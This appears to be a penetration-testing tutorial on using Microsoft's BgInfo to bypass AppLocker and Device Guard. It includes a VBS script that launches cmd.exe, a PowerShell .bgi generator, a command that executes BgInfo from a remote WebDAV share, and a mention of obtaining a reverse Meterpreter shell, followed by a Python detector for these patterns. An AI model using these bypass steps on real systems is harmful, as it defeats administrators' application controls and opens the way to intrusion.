BgInfo is a Microsoft utility that automatically displays system information about the computer directly on the desktop background. It is one of the utilities that system administrators use very often, so it can be found on a number of systems.

Oddvar Moe discovered that BgInfo can be used to bypass AppLocker and Device Guard restrictions, since it has the ability to execute VBS scripts. As a proof of concept he wrote a simple script that launches a command prompt.

cmd.vbs

' Program to launch and the directory it lives in.
strProgram = "cmd.exe"
strPath    = "C:\windows\system32"

' Build the full path C:\windows\system32\cmd.exe.
Set fso = CreateObject("Scripting.FileSystemObject")
strCommand = fso.BuildPath(strPath, strProgram)

' Launch the program through the shell with a normal window (show flag 1).
Set app = CreateObject("Shell.Application")
app.ShellExecute strCommand, , strPath, , 1

' BgInfo-specific: the echoed text is what the VBS custom field displays.
echo "pentestlab"

In BgInfo, a custom field needs to be added that points to the cmd.vbs script.

BgInfo AppLocker Bypass – Configuration

Once the OK button is pressed, the VBS code is executed and a command prompt opens.

BgInfo Bypass – Command Prompt

Generating BGI Files

The BgInfo configuration can be saved as a .bgi file, which means that cmd.vbs can be executed automatically without creating a new custom field every time BgInfo runs.

The following PowerShell script generates a BGI file containing the path where cmd.vbs is located. Any other script can be used instead of cmd.vbs.

# Path of the script to embed in the BGI file; any script path can be substituted.
$VbsPath="C:\test\cmd.vbs"
# The length field covers the path plus the CRLF that Out-File appends below.
$Length=$VbsPath.Length+2

# Base64 of a template .bgi file (the blob itself is not preserved on this page).
$fileContent = "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"
$fileContentBytes = [System.Convert]::FromBase64String($fileContent)
[System.IO.File]::WriteAllBytes("test1.bgi",$fileContentBytes)

# Note: FileStream resolves a relative path against the process working directory,
# while Out-File uses the PowerShell location; run this from a directory where both
# agree, or use a full path for test1.bgi.
# Seek to the end and append the field header: the length byte, three zero bytes and 0x34.
$fs=new-object io.filestream "test1.bgi",open
$fs.seek(0,2)| Out-Null
$fs.writebyte($Length)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x34)
$fs.flush()
$fs.close()

# Append the script path as ASCII text (Out-File adds a trailing CRLF).
$VbsPath | Out-File -Encoding ascii -Append test1.bgi

# Step back over the CRLF and write the trailing bytes that close the field.
$fs=new-object io.filestream "test1.bgi",open
$fs.seek(-2,2)| Out-Null
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x01)
$fs.writebyte(0x80)
$fs.writebyte(0x00)
$fs.writebyte(0x80)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.writebyte(0x00)
$fs.flush()
$fs.close()

As soon as the BGI file is executed, cmd.vbs runs and a command prompt opens.

BgInfo & Command Prompt

Alternatively, the .BGI file can be executed via Run, or remotely from a WebDAV server.

C:\BgInfo\Bginfo.exe test1.bgi /popup /nolicprompt
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt

Execute BGI File via Run
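As an added defensive example (not code from the original post), the following Python script applies three hunting rules derived from the behaviour described above to constructed process-creation events: BgInfo spawning a shell or script host, the BgInfo binary executed from a UNC/WebDAV path, and a .bgi configuration loaded from a UNC path. The JSON field names are assumptions to be mapped from Sysmon Event ID 1 or Security event 4688.

```python
import json
import ntpath

# Constructed sample process-creation events, one JSON record per line. The
# field names image / parent_image / command_line are assumptions; map them
# from Sysmon Event ID 1 or Security event 4688 in a real pipeline.
SAMPLE_EVENTS = r'''
{"image": "C:\\BgInfo\\Bginfo.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "C:\\BgInfo\\Bginfo.exe test1.bgi /popup /nolicprompt"}
{"image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\BgInfo\\Bginfo.exe", "command_line": "cmd.exe"}
{"image": "\\\\10.10.10.10\\webdav\\bginfo.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "\"\\\\10.10.10.10\\webdav\\bginfo.exe\" bginfo.bgi /popup /nolicprompt"}
{"image": "C:\\BgInfo\\Bginfo.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "Bginfo.exe \\\\10.10.10.10\\webdav\\bginfo.bgi /popup /nolicprompt"}
{"image": "C:\\BgInfo\\Bginfo.exe", "parent_image": "C:\\Windows\\System32\\svchost.exe", "command_line": "Bginfo.exe corp.bgi /timer:0 /nolicprompt"}
{"image": "C:\\Windows\\System32\\conhost.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "conhost.exe"}
'''

# Shells and script hosts that a wallpaper-refreshing BgInfo has no reason to start.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}

def load_events(text):
    """Parse JSON-lines text into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def _base(path):
    # ntpath handles drive and UNC paths regardless of the host OS.
    return ntpath.basename(path).lower()

def analyze(events):
    """Return (rule, command_line) hits, in event order."""
    hits = []
    for ev in events:
        image, parent, cmdline = ev["image"], ev["parent_image"], ev["command_line"]
        # Rule 1: a shell or script host whose parent is BgInfo; the VBS custom
        # field calling Shell.Application produces exactly this lineage.
        if _base(parent) == "bginfo.exe" and _base(image) in INTERPRETERS:
            hits.append(("bginfo_child_interpreter", cmdline))
        if _base(image) != "bginfo.exe":
            continue
        # Rule 2: the BgInfo binary itself executed from a UNC/WebDAV path.
        if image.startswith("\\\\"):
            hits.append(("bginfo_from_unc", cmdline))
        # Rule 3: the .bgi configuration pulled from a UNC/WebDAV path.
        for arg in (a.strip('"') for a in cmdline.split()):
            if arg.lower().endswith(".bgi") and arg.startswith("\\\\"):
                hits.append(("bgi_config_from_unc", cmdline))
    return hits

if __name__ == "__main__":
    for rule, cmdline in analyze(load_events(SAMPLE_EVENTS)):
        print(f"{rule}: {cmdline}")
```

The scheduled run from svchost.exe with a local corp.bgi produces no hit, so a normal logon-script deployment stays quiet while the three bypass patterns are surfaced.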

Meterpreter

Based on the work Cn33liz did on weaponized VBS scripts containing Metasploit payloads, it is possible to use them to obtain a reverse Meterpreter shell through the BgInfo utility.

BgInfo – VBSMeter

Meterpreter – BgInfo

Command Prompt

Even in an environment where the command prompt is blocked by a deny rule, it is still possible to run one by exploiting weak path rules and modifying the script to execute Didier Stevens' version of CMD.

The first two lines of the cmd.vbs script need to be modified so that the binary is executed from a location where a user has read and write access by default.

BgInfo – Run CMD

As a result, the command prompt opens, bypassing the AppLocker rule.

Running Command Prompt via BgInfo

Resources

Clarification – BGInfo 4.22 – AppLocker still vulnerable

Bypassing Application Whitelisting with BGInfo

https://github.com/3gstudent/bgi-creater

https://github.com/Cn33liz/VBSMeter/blob/master/VBSMeter.vbs
